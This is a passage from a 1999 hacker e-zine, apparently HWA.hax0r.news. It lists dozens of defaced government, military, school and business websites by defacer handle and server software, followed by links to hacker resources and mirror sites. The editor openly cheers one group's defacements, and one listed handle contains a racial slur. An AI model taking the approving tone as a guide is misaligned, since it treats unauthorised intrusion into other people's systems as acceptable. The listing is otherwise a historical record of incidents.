Note: The hacked site reports stay, especially wsith some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
check out http://www.attrition.org/mirror/attrition/groups.html to see who
you are up against. You can often gather intel from IRC as many of these
groups maintain a presence by having a channel with their group name as the
channel name, others aren't so obvious but do exist.
>Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
* Info supplied by the attrition.org mailing list.
Listed oldest to most recent...
Defaced domain: www.activedev.net
Site Title: Active Development
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.activedev.net
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.18, 99.12.15, 99.12.07 by acidklown, pyrostorm666, pyrostorm666
Potentially offensive content on defaced page.
Defaced domain: www.chegamais.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.chegamais.com
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: image1.ouhsc.edu
Site Title: University of Oklahoma Health Sciences Center
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/image1.ouhsc.edu
Defaced by: relogic
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.allianceenterprises.com
Site Title: Alliance Enterprises
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.allianceenterprises.com
Defaced by: relogic
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.firstgpa.com
Site Title: First American Gropu Purchasing Association
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.firstgpa.com
Defaced by: relogic
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.webdr.com
Site Title: The WEB Doctor
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.webdr.com
Defaced by: relogic
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.benthic.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.benthic.com
Defaced by: Wolf
Operating System: Irix (Rapidsite/Apa-1.3.4 FrontPage)
Potentially offensive content on defaced page.
Defaced domain: www.teddies4ever.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.teddies4ever.com
Defaced by: WKD
Operating System: Solaris
Defaced domain: www.harp-industries.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.harp-industries.
Defaced by: inkk
Operating System: Solaris 2.6 - 2.7
Potentially offensive content on defaced page.
Defaced domain: www.nsbrasil.org
Site Title: Melckzedeck Aquino de Aracjo
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.nsbrasil.org
Defaced by: Death Knights
Operating System: Linux (Apache 1.3.4)
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.
Defaced domain: www.alas.net
Site Title: Alexandre Simoes
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.alas.net
Defaced by: Death Knights
Operating System: Linux (Apache 1.3.4)
Potentially offensive content on defaced page.
Defaced domain: www.thsrock.net
Site Title: Trinity High School RockNet
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.thsrock.net
Defaced by: Pezzdc
Operating System: Windows NT (WebSitePro/2.3.15)
Previously defaced on 99.12.16 by f1ber
Potentially offensive content on defaced page.
Defaced domain: www.cm-lisboa.pt
Site Title: Câmara Municipal de Lisboa
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.cm-lisboa.pt
Defaced by: F0rpaxe
Operating System: Windows NT
Attrition comment: This is the Web site for the Governor of Lisbon, the capital of Portugal
Defaced domain: eagles.eems.giles.k12.va.us
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/eagles.eems.giles.k12.va.us
Defaced by: verb0
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: games.eesite.com
Site Title: Echelon Entertainment
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/games.eesite.com
Defaced by: verb0
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page
Defaced domain: cardserver.eesite.com
Site Title: Echelon Entertainment
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/cardserver.eesite.com
Defaced by: verb0
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.itaipu.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.itaipu.gov.br
Defaced by: inferno.br
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.torahacademy.org
Site Title: MTC Enterprises
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.torahacademy.org
Defaced by: unknown
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.19 by f1ber
Potentially offensive content on defaced page.
Defaced domain: www.smc.com.br
Site Title: SMC Internet Services
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.smc.com.br
Defaced by: Ass0mbracao
Operating System: Windows NT
Potentially offensive content on defaced page.
Defaced domain: sugok.chongju-e.ac.kr
Site Title: ChongJu National University of Education
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/sugok.chongju-e.ac.k
Defaced by: JvM
Operating System: Solaris 2.6
Potentially offensive content on defaced page.
Defaced domain: www.map.org
Site Title: MAP International
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.map.org
Defaced by: unknown
Operating System: Solaris 2.6 - 2.7
Previously defaced on by
Potentially offensive content on defaced page.
Defaced domain: www.arc.gov
Site Title: Appalachian Regional Commission
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.arc.gov
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.fairus.org
Site Title: FAIR
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.fairus.
Defaced by: Ass0mbracao
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.19 99.12.18 by
Potentially offensive content on defaced page
Defaced domain: facepe.pe.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/facepe.pe.gov.br
Defaced by: Shadow
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.cisco.net
Site Title: Cisco.Net
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.cisco.net
Defaced by: Digital Domination
Operating System: Digital Unix (Apache/1.2.6 FrontPage/3.0.4)
Previously defaced on 99.12.19 by DD
Potentially offensive content on defaced page.
Defaced domain: eagles.eems.giles.k12.va.us
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/eagles.eems.giles.k12.va.us
Defaced by: acidklown
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.21 by Verb0
Potentially offensive content on defaced page.
Defaced domain: www.theisp.net
Site Title: Discovery Online, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.theisp.net
Defaced by: Uneek Tech
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.virtualshack.com
Site Title: virtualshack.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.virtualshack.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: members.geosoft.org
Site Title: The Geosoft Network
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/members.geosoft.org
Defaced by: HiP
Operating System: Windows NT (Apache 1.3.9 Win32)
Potentially offensive content on defaced page.
Defaced domain: www.thegolftravelcenter.com
Site Title: Randy Young (THEGOLFRAVELCENTER-DOM)
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.thegolftravelcenter.com
Defaced by: Ass0mbracao
Operating System: NT
Previously defaced on 99.12.19 by BLN
Potentially offensive content on defaced page.
Attrition comment: Also defaced www.smc.com.br
Defaced domain: www.contrast-clothing.com
Site Title: Contrast Clothing
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.contrast-clothing.com
Defaced by: unknown
Operating System: NT
HIDDEN comments in the HTML.
Defaced domain: www.oirm.bia.gov
Site Title: Office of Information Resources Management, Bureau of Indian Affairs
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.oirm.bia.gov
Defaced by: phiber
Operating System: Windows NT
Potentially offensive content on defaced page.
Defaced domain: www.cya.ca.gov
Site Title: California Department of Youth Authority
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.cya.ca.gov
Defaced by: phiber
Operating System: Windows NT
Defaced domain: www.irr.bia.gov
Site Title: Indian Reservation Roads Program, Bureau of Indian Affairs
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.irr.bia.gov
Defaced by: phiber
Operating System: Windows NT
Defaced domain: www.ocf.anl.gov
Site Title: Office of the Chief Financial Officer, Argonne National Labs
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.ocf.anl.gov
Defaced by: phiber
Operating System: Windows NT
Defaced domain: www.calgold.ca.gov
Site Title: CalGOLD Business Permits
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.calgold.ca.gov
Defaced by: phiber
Operating System: Windows NT
Defaced domain: www.samaritan.org
Site Title: Samaritan's Purse
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.samaritan.org
Defaced by: B.L.Z. Bub
Operating System: NT
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.
Defaced domain: www.zenworksmaster.com
Site Title: ZENMaster
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.zenworksmaster.com
Defaced by: Ass0mbracao
Operating System: NT
Previously defaced on 99.12.19 by BLN
Potentially offensive content on defaced page.
Defaced domain: www.fmc.gov
Site Title: Federal Maritime Commission
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.fmc.gov
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: democrats.assembly.ca.gov
Site Title: California State Assembly Democratic Caucus
Mirror:
http://www.attrition.org/mirror/attrition/1999/12/22/democrats.assembly.ca.gov/
Defaced by: phiber
Operating System: Windows NT
Defaced domain: www.taonline.com
Site Title: DI-USA, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.taonline.com
Defaced by: Pyrostorm666
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.pitt.ang.af.mil
Site Title: Air National Guard
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.pitt.ang.af.mil
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.laredo.k12.tx.us
Site Title: Texas K12 Schools
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.laredo.k12.tx.us
Defaced by: Ass0mbracao
Operating System: Windows NT or WFW 3.11
Previously defaced on 99.12.16 by f1ber
Potentially offensive content on defaced page
Defaced domain: www.dfi.ca.gov
Site Title: State of California
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.dfi.ca.gov
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.h-c-v.org
Site Title: HCV
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.h-c-v.org
Defaced by: ezoons
Operating System: FreeBSD 2.2.1
Potentially offensive content on defaced page.
Defaced domain: www.upshq.com
Site Title: United Phreaks Syndicate
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.upshq.com
Defaced by: MOTHERFUCKER GRANDPA NIGZ
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.cssc.gov
Site Title: Customer Systems Support Center
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.cssc.gov
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.jcomtraining.com
Site Title: JCom Computer Training
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.jcomtraining.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.cascades-spa.com
Site Title: 2032272 Nova Scotia Ltd
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.cascades-spa.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.drkenner.com
Site Title: Dr. Harris Kenner
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.drkenner.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.lunarvision.com
Site Title: Lunar Video Communications
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.lunarvision.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: cpma.apg.army.mil
Site Title: Army Signal Command
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/cpma.apg.army.mil
Defaced by: THESAINT666
Operating System: NT
Previously defaced on 99.12.04 by k-0s
Defaced domain: www.k9express.com
Site Title: RD&K Associated
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.k9express.com
Defaced by: BLN
Operating System: NT
Defaced domain: www.bankerusa.com
Site Title: Banker of USA Mortgage
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.bankerusa.com
Defaced by: THESAINT666
Operating System: Windows NT (IIS/3.0)
Previously defaced on 99.04.23 by tonekore
Potentially offensive content on defaced page.
Defaced domain: www.freezonez.com
Site Title: Blasie Tech
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.freezonez.com
Defaced by: wired
Operating System: FreeBSD (Apache 1.2.6)
Potentially offensive content on defaced page.
Defaced domain: www.infoctr.edu
Site Title: Library of International Relations
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.infoctr.edu
Defaced by: THESAINT666
Operating System: NT
Defaced domain: www.hotelsmexico.com
Site Title: Posadas de Mexico
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.hotelsmexico.com
Defaced by: THESAINT666
Operating System: NT
Defaced domain: www.leet-2000.com
Site Title: anastacio esteviz
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.leet-2000.com
Defaced by: styles
Operating System: BSDI (Apache 1.3.6)
Potentially offensive content on defaced page.
Defaced domain: www.expoente.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.expoente.com.br
Defaced by: Ass0mbracao/OHB
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.10.19 and 99.12.11 by OHB and Death Knights
Potentially offensive content on defaced page.
Defaced domain: www.acommedia.com
Site Title: ACom Media Ltd
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.acommedia.com
Defaced by: phiber
Operating System: Red Hat Linux (Apache 1.3.3)
Potentially offensive content on defaced page.
Defaced domain: www.conagg.com
Site Title: Construction Aggregate Equipment Company
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.conagg.com
Defaced by: Unknown since their HTML called a bad image.
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.ndn.co.jp
Site Title: Nippon Data Net Limited Partnership
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.ndn.co.jp
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.03.05 99.10.31 99.10.29 by xoloth1 () DHC
Potentially offensive content on defaced page.
Defaced domain: www.lyon.k12.ky.us
Site Title: Kentucky K12 Schools
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.lyon.k12.ky.us
Defaced by: PurpleHaze
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.gddc.pt
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.gddc.pt
Defaced by: Shandar
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.cphv.org
Site Title: Center to Prevent Handgun Violence
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.cphv.org
Defaced by: Ass0mbracao
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.19 by Analognet
Potentially offensive content on defaced page.
Defaced domain: www.goprismatic.com
Site Title: Totally Bogus Men Company
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.goprismatic.com
Defaced by: #phreak.nl
Operating System: Linux (Apache 1.3.4)
Potentially offensive content on defaced page.
Defaced domain: www.sicily.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.sicily.navy.mil
Defaced by: THESAINT666
Operating System: Windows NT
Potentially offensive content on defaced page.
Defaced domain: www.ordermed.com
Site Title: ordermed
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.ordermed.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.mute300.net
Site Title: MUTE300
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.mute300.net
Defaced by: crack & crx
Operating System: FreeBSD (Apache 1.2.6)
Previously defaced on 99.11.17 by Sabu
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.
Defaced domain: www.domain-network.net
Site Title: BLAH
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.domain-network.net
Defaced by: wired
Operating System: FreeBSD (Apache 1.2.6)
Potentially offensive content on defaced page.
Defaced domain: www.inet.tsinghua.edu.cn
Site Title: Institute of Nuclear Energy Technology of Tsinghua University
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.inet.tsinghua.edu.cn
Defaced by: Bosnatek
Operating System: Solaris 2.5x
Potentially offensive content on defaced page.
Defaced domain: www.jadenterprises.com
Site Title: J.A.D. Enterprises Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.jadenterprises.com
Defaced by: w0lf
Operating System: Irix? (Rapidsite/Apa-1.3.4)
Potentially offensive content on defaced page.
Defaced domain: www.asiplc.com
Site Title: Automation Solutions, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.asiplc.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.webquestcom.com
Site Title: Conquest Communications, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.webquestcom.com
Defaced by: Rhallado
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.networkmediadevices.com
Site Title: Network Media Devices, Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.networkmediadevices.com
Defaced by: BOG
Operating System: Linux (Apache 1.3.6)
Potentially offensive content on defaced page.
Defaced domain: www.colella.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.colella.com.br
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.planet3000.com
Site Title: Sebastian Harrison
Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.planet3000.com
Defaced by: Rhallado
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.cafepiupiu.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.cafepiupiu.com.br
Defaced by: hts & white_course
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.presbycoalition.org
Site Title: The Presbyterian Coalition
Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.presbycoalition.org
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.vvs-online.com
Site Title: V.V.S. bvba
Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.vvs-online.com
Defaced by: illusions team
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page
Defaced domain: www.imagemine.com
Site Title: imagemine
Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.imagemine.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.tdicomputers.com
Site Title: Aerodiam nv
Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.tdicomputers.com
Defaced by: illusions team
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW **
http://datatwirl.intranova.net ** NEW **
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/zine/hwa/ *UPDATED*
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://securax.org/cum/ *New address*
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Colombia......: http://www.cascabel.8m.com
http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
http://www.hack.co.za
http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
and best security related e-zine.
.za (South Africa) sites contributed by wyzwun tnx guy...
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]